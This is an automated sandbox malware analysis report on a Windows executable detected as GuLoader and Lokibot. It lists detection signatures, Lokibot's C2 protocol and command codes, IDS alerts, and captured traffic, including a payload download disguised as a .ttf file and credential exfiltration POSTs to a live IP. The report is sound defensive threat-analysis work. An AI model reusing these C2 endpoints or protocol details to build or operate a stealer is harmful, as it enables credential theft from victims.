Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HfJLn9erXb.exe

Overview

General Information

Sample Name:HfJLn9erXb.exe
Analysis ID:829104
MD5:049ecad4587538c292e3ebeee5947eb5
SHA1:12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256:cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • HfJLn9erXb.exe (PID: 8604 cmdline: C:\Users\user\Desktop\HfJLn9erXb.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
    • HfJLn9erXb.exe (PID: 2912 cmdline: C:\Users\user\Desktop\HfJLn9erXb.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
      • WerFault.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1379713929.000000000348C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: HfJLn9erXb.exe PID: 8604JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: HfJLn9erXb.exe PID: 2912JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          No Sigma rule has matched
          Timestamp:192.168.11.20185.246.220.8549802802024317 03/17/23-20:59:19.936439
          SID:2024317
          Source Port:49802
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.246.220.8549802802024312 03/17/23-20:59:19.936439
          SID:2024312
          Source Port:49802
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.246.220.8549802802825766 03/17/23-20:59:19.936439
          SID:2825766
          Source Port:49802
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.246.220.8549802802021641 03/17/23-20:59:19.936439
          SID:2021641
          Source Port:49802
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.246.220.8549802802025381 03/17/23-20:59:19.936439
          SID:2025381
          Source Port:49802
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: HfJLn9erXb.exeReversingLabs: Detection: 51%
          Source: HfJLn9erXb.exeVirustotal: Detection: 53%Perma Link
          Source: http://185.246.220.85/habrik/five/fre.phpAvira URL Cloud: Label: malware
          Source: HfJLn9erXb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: HfJLn9erXb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
          Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_0040626D FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004026FE FindFirstFileA,

          Networking

          barindex
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49802 -> 185.246.220.85:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49802 -> 185.246.220.85:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49802 -> 185.246.220.85:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49802 -> 185.246.220.85:80
          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49802 -> 185.246.220.85:80
          Source: Joe Sandbox ViewIP Address: 85.95.248.49 85.95.248.49
          Source: Joe Sandbox ViewIP Address: 185.246.220.85 185.246.220.85
          Source: global trafficHTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: HfJLn9erXb.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: HfJLn9erXb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002310000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.0000000032480000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/tft
          Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknownHTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
          Source: unknownDNS traffic detected: queries for: ruhsalgelisim.com
          Source: global trafficHTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: HfJLn9erXb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_00404A0E
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004065F6
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_735D1A9C
          Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs HfJLn9erXb.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeSection loaded: edgegdi.dll
          Source: HfJLn9erXb.exeStatic PE information: invalid certificate
          Source: HfJLn9erXb.exeReversingLabs: Detection: 51%
          Source: HfJLn9erXb.exeVirustotal: Detection: 53%
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile read: C:\Users\user\Desktop\HfJLn9erXb.exeJump to behavior
          Source: HfJLn9erXb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile created: C:\Users\user\AppData\Roaming\fumigatoriumJump to behavior
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2AD0.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile written: C:\Users\user\AppData\Local\Temp\Kontos.iniJump to behavior
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: HfJLn9erXb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
          Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: HfJLn9erXb.exe PID: 8604, type: MEMORYSTR
          Source: Yara matchFile source: 00000002.00000002.1379713929.000000000348C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_735D2F20 push eax; ret
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_03335F04 push es; ret
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_033303E6 push 620F66DAh; iretd
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_03330E2F push ds; ret
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_0333208F push edx; retf
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 7_2_01665F04 push es; ret
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 7_2_016603E6 push 620F66DAh; iretd
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 7_2_01660E2F push ds; ret
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 7_2_0166208F push edx; retf
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeCode function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile created: C:\Users\user\AppData\Local\Temp\nsb2DEE.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeFile created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dllJump to dropped file
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\HfJLn9erXb.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
